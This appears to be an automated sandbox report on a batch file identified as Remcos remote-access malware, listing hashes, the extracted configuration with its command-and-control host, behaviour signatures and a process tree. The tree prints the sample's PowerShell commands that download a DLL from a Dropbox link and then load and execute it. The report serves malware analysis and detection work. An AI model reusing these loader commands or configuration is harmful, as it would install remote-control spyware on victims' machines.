Analysis
-
max time kernel
100s -
max time network
144s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24-11-2024 11:21
Static task
static1
Behavioral task
behavioral1
Sample
test - Kopie.bat
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
test - Kopie.bat
Resource
win11-20241007-en
General
-
Target
test - Kopie.bat
-
Size
658B
-
MD5
4a05279e903f0365d0ccc4908662ddda
-
SHA1
7826242544d70e9626910a303cff42e0cade2ae6
-
SHA256
e8aeb5c36fdf6931d14ac8b8b51ba4f1da459bf8481a2657c73d52a0a3bf62f4
-
SHA512
e249db02052cfac12f6eb6a4ec0e1fb80899ae7294993aeecb3f5fad0238ba1ffd274307de236a59611290a372fe4038b7d1b23deb91e30b706b57d753a20925
Malware Config
Extracted
remcos
RemoteHost
23.ip.gl.ply.gg:24321
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
Rmc.exe
-
copy_folder
RootRmc
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
true
-
install_path
%SystemDrive%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-M1WJOM
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 4560 powershell.exe 8 4560 powershell.exe -
pid Process 4560 powershell.exe 5448 powershell.exe -
Downloads MZ/PE file
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4560 powershell.exe 4560 powershell.exe 5448 powershell.exe 5448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 5448 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1628 wrote to memory of 4560 1628 cmd.exe 84 PID 1628 wrote to memory of 4560 1628 cmd.exe 84 PID 1628 wrote to memory of 5448 1628 cmd.exe 85 PID 1628 wrote to memory of 5448 1628 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test - Kopie.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/ced931yp7ygkbsx3fibr1/test.dll?rlkey=23mh4gtrl35mfqlt6suof5w8d&st=evzmjztv&dl=1' -OutFile 'test.dll'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -Path 'test.dll'; [TestClass]::Execute()"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5448
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ed30ca9187bf5593affb3dc9276309a6
SHA1c63757897a6c43a44102b221fe8dc36355e99359
SHA25681fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA5121df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize
1KB
MD5670c4920a79e1c12a6c4e8ff4007562b
SHA15023e825d4a8af071498411f589f3b25ff335f0f
SHA25637c4a07c009ffa6061e7ffcec01d0eb2c1a2c7ac94fc3d2208e1bfee6815c92f
SHA512d717acfd4aea4d2788b06be081c00d97929eadaa97b9144ebc02617837d8c9ffaad30f3bef0a662c560dc2bc98603853af3404120f5ac2430335dda06e7c5bd5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
465KB
MD5c52987ac16d800661b0673db0e88e040
SHA18887a9096dd5baa81fc841fd4066978aabc66d66
SHA25600f66290090abad9e0c8a98e659723a29ad621862a54ff7b67dc326b4cf74ae6
SHA5125431218a44e0a26337b6ad78f4cf225c735a104751a542cb7d882e69ba711b3001d855199c7b91d6113eca2095257daacbb642cf1e84fa1c11e913f5d401782d